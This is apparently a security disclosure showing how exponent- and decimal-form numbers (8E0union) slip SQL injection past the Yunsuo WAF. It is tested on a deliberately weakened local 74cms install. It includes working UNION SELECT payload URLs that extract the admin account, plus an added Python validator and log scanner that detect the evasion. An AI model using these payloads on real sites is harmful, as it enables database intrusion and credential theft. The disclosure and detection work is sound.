### Brief description:
This time, a concrete example.
### Details:
@疯狗 thanks for the tip; see the zone thread http://zone.wooyun.org/content/16772
The bypass uses the form `id=8E0union select ...` (a numeric literal in exponent notation glued directly to the keyword)
and likewise `id=8.0union select ...`.
### Proof of vulnerability:
A 74cms web environment was set up locally with all Yunsuo (云锁) protections turned on.
![yy.jpg](https://images.seebug.org/upload/201412/31122654e5de7ba857b1532eb3f5c7bd012036ff.jpg)
The injection point below was tested after removing the corresponding `intval()` call.
include/fun_wap.php
```php
function company_one($id)
{
    global $db;
    // Here: $id is concatenated into the WHERE clause without intval()
    $wheresql=" WHERE id=".$id;
    $sql = "select * from ".table('company_profile').$wheresql." LIMIT 1";
    $val=$db->getone($sql);
    return $val;
}
```
The global GPC filtering was also switched off for the test:
/include/common.inc.php
```php
if (!empty($_GET))
{
    // Here: GET-type injection; addslashes_deep() on $_GET was removed for the test
}
if (!empty($_POST))
{
    $_POST = addslashes_deep($_POST);
}
```
1.http://localhost/74/wap/wap-company-show.php?id=8E0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
The injectable columns all show up:
![yy.jpg](https://images.seebug.org/upload/201412/3112234173f2208ffc1128f100e380e115618e89.jpg)
2.http://localhost/74/wap/wap-company-show.php?id=8E0union%20select%201,2,3,admin_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20qs_admin#
The administrator account name comes out:
![yy1.jpg](https://images.seebug.org/upload/201412/31122615c3489148d5accc617238c5a0f7234ebb.jpg)
Administrator password:
![yy2.jpg](https://images.seebug.org/upload/201412/3112263201d3dac77edfb511b37be9cebf4b3441.jpg)
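As an added defensive example (not part of the original report or of 74cms), the check below does what the removed `intval()` did, accepting only a canonical decimal integer for `id`, and scans constructed access-log lines for the exponent/decimal obfuscation (`8E0union`, `8.0union`) that the report shows slipping past a keyword rule. The log format and function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Canonical integer id: ASCII digits only. This is the property intval()
# enforced in the original code; anything else never reaches the SQL string.
CANONICAL_INT = re.compile(r"^[0-9]+$")

# Numeric literal in exponent or decimal form glued to a keyword, e.g.
# "8E0union" or "8.0union". MySQL tokenises "8E0" / "8.0" as a number and
# "union" as the following token, so a rule that expects whitespace
# between the number and UNION does not fire.
OBFUSCATED_NUMERIC = re.compile(r"^[0-9]+(?:\.[0-9]*|[eE][+-]?[0-9]+)[A-Za-z]")

def classify_param(value: str) -> str:
    """Return 'ok', 'obfuscated-numeric' or 'non-numeric' for an id value."""
    if CANONICAL_INT.match(value):
        return "ok"
    if OBFUSCATED_NUMERIC.match(value):
        return "obfuscated-numeric"
    return "non-numeric"

def scan_access_log(lines, param="id"):
    """Flag requests whose numeric parameter is not a canonical integer."""
    findings = []
    for line in lines:
        # Assumed (constructed) log shape: '... "GET <path> HTTP/1.1" <status>'
        m = re.search(r'"GET (\S+) HTTP', line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name == param:
                verdict = classify_param(value)
                if verdict != "ok":
                    findings.append((value, verdict))
    return findings

# Constructed sample lines (not from the report): one clean, two evasive.
SAMPLE_LOG = [
    '10.0.0.5 - - [31/Dec/2014:12:26:54 +0800] "GET /74/wap/wap-company-show.php?id=8 HTTP/1.1" 200',
    '10.0.0.5 - - [31/Dec/2014:12:26:55 +0800] "GET /74/wap/wap-company-show.php?id=8E0union%20select%201,2,3 HTTP/1.1" 200',
    '10.0.0.5 - - [31/Dec/2014:12:26:56 +0800] "GET /74/wap/wap-company-show.php?id=8.0union%20select%201,2,3 HTTP/1.1" 200',
]

if __name__ == "__main__":
    for value, verdict in scan_access_log(SAMPLE_LOG):
        print(f"{verdict}: {value!r}")
```

The durable fix is still to restore `intval()` (or a prepared statement) in `company_one()`; the log scan only tells you which requests were trying this form.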